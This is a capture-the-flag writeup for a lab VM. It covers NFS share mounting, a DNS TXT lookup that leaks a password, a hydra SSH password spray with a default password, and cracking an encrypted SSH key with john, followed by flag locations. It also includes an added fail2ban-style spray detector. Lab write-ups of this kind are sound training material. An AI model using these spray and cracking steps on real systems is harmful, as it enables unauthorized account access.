THM: Writeup krautinc

This room is about NFS, DNS, SSH and Mail. So take your time and enumerate carefully.

Step 1) Read the attached MEMO carefully
Read the provided PDF. Who could be leaking data?

Step 2) Deploy the VM and start enumerating
Let's start with nmap and see which ports are open:
nmap -sV -sC <IP>
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
111/tcp open rpcbind
2049/tcp open nfs


Let's start with the NFS share:
showmount -e <IP>
/srv/secret 192.168.230.0/255.255.255.0,10.0.0.0/255.0.0.0

OK, there is a share /srv/secret; let's mount it:
mount <IP>:/srv/secret /mnt

Let's check what we can find there:
drwxr-xr-x 5 root root 4096 Dec 13 15:18 .
drwxr-xr-x 19 root root 4096 Dec 13 03:55 ..
d--------- 3 root root 4096 Dec 11 07:07 ...
drwxr-xr-x 2 root root 4096 Dec 13 14:59 images
-rw-r--r-- 1 root root 22899 Dec 13 15:04 jail.conf
-rw------- 1 root root 16384 Dec 13 15:17 .jail.conf.swp
drwxr-xr-x 2 root root 4096 Dec 11 06:28 jail.d
-rw------- 1 root root 385 Dec 13 15:02 security-note-txt
-rw-r--r-- 1 1004 1004 86 Dec 13 15:05 telefon.txt
-rw-r--r-- 1 root root 27818 Dec 13 15:18 .unkown.png

There are many interesting things on that share, and somewhere there is a flag 🙂

  • .unknown.png looks interesting. There seems to be some hint regarding DNS. We will try this out in a minute.
  • images seems to be interesting too.
  • security-note-txt looks like some base64 stuff

Step 3) Analyze the content of the nfs share. Fire up your first DNS query
We will try out the DNS. It looks like there are some TXT records in the zone. Let's try it:
dig dieter.kraut.thm TXT @<IP>

will give you a password – maybe for the user dieter?

Step 4) Access the VM via ssh
Let's SSH into the machine with the given password:
ssh dieter@<IP>

We will get a hint about a default password. Now we need to think about which user this could be. Remember the note about fail2ban.
Which user should we use to test this? Remember telefon.txt: it gives us a short list. We can remove Dieter and Hans from that list.
Since Peter is the CEO he should not work with the default password. This leaves us with:
karl
wolfgang
markus

We put these in a list named /tmp/user.
Let's start hydra then (single quotes keep the ! from being expanded by the shell):
hydra -L /tmp/user -p 'logmein!42' ssh://<IP>

markus is the user who has still the default password.
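The fail2ban note and the single-password spray above make a good point to look at the other side: what the sshd jail sees. Below is an added example, not part of the original writeup, that runs a simplified version of fail2ban's sshd jail logic (maxretry failures within findtime seconds per source address) over constructed sshd log lines; the host name, addresses, PIDs and the assumed year are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines (syslog format); not taken from the room's VM.
SAMPLE_AUTH_LOG = """\
Dec 13 15:20:01 kraut sshd[1201]: Failed password for invalid user karl from 10.0.0.5 port 40110 ssh2
Dec 13 15:20:02 kraut sshd[1203]: Failed password for wolfgang from 10.0.0.5 port 40112 ssh2
Dec 13 15:20:02 kraut sshd[1205]: Accepted password for markus from 10.0.0.5 port 40114 ssh2
Dec 13 15:20:03 kraut sshd[1207]: Failed password for karl from 10.0.0.5 port 40116 ssh2
Dec 13 15:20:04 kraut sshd[1209]: Failed password for wolfgang from 10.0.0.5 port 40118 ssh2
Dec 13 15:20:05 kraut sshd[1211]: Failed password for karl from 10.0.0.5 port 40120 ssh2
Dec 13 15:30:00 kraut sshd[1301]: Failed password for dieter from 10.0.0.9 port 50001 ssh2
Dec 13 15:40:00 kraut sshd[1302]: Failed password for dieter from 10.0.0.9 port 50002 ssh2
Dec 13 15:50:00 kraut sshd[1303]: Failed password for dieter from 10.0.0.9 port 50003 ssh2
"""

# Matches sshd's failure line; "invalid user" is present when the name does not exist.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)

def parse_ts(ts, year=2023):
    """Syslog timestamps carry no year, so one is assumed here (example assumption)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def find_bans(log_text, maxretry=5, findtime=600):
    """Return {ip: sorted user names tried} for every source that reaches `maxretry`
    failed logins within `findtime` seconds (fail2ban's defaults), per-IP sliding window."""
    window = defaultdict(deque)   # ip -> deque of (timestamp, user) still inside the window
    banned = {}
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue                 # accepted logins and unrelated lines are ignored
        t, ip = parse_ts(m["ts"]), m["ip"]
        q = window[ip]
        q.append((t, m["user"]))
        while (t - q[0][0]).total_seconds() > findtime:
            q.popleft()              # drop attempts older than findtime
        if len(q) >= maxretry and ip not in banned:
            banned[ip] = sorted({u for _, u in q})
    return banned

if __name__ == "__main__":
    for ip, users in find_bans(SAMPLE_AUTH_LOG).items():
        print(f"ban {ip}: {len(users)} distinct user names tried (looks like a password spray)")
```

Note that 10.0.0.9 is never banned with the default window: its three failures are spaced ten minutes apart, which is exactly the kind of slow attempt a findtime-based jail misses.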

Step 5) It is Mail-Time
Enumerate the VM after logging in as markus:
You have new mail.
markus@kraut:~$

That looks interesting. Let's have a look if we can find something useful there:
Running mail shows three unread emails.

One email is from "wurst", whoever that is, and contains a private key:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,EA107208EE6B3469EB5651115721E91E

8QUr9Q2+Alcq98MuKIk8bRKov5tg+arPoKV9fzBqHP+EGhFBzqEfD0DSVnymLV8X

83xzBVAa47GVh+ypSZz0aqubq7Xq3kPumQ43XoF9/I01OflDA47ty/lsKhSdBH3/
-----END RSA PRIVATE KEY-----

Let's use ssh2john and john to crack the passphrase of this key.

After cracking the password we might have an ssh key to another user account. Maybe hans or root?

Step 6) Getting root
After getting root access (there are two ways: one via SSH, the other via privilege escalation) we can start searching for the flags:

1st flag: nfs-share .../.../.../.flag.txt
2nd and 3rd flag somewhere in the home directory of Dieter and Karl (not used)
4th flag in the home of Hans Mail/sent
5th flag in a zone file inside of /etc/bind (not used)
6th flag in the root-home (not used)
7th flag in the root mailbox
8th flag in the base64-code (not used)

Step 7) Who has leaked the information?

Who has leaked the information? Hans or Markus?

  • Look at the QR-Code and read some mails from the mailboxes of Hans, Markus and maybe Peter.

echo "VGh…yYXV0IHRobXthbHdheXNfb25fa3JhdXR9Cg==" | base64 -d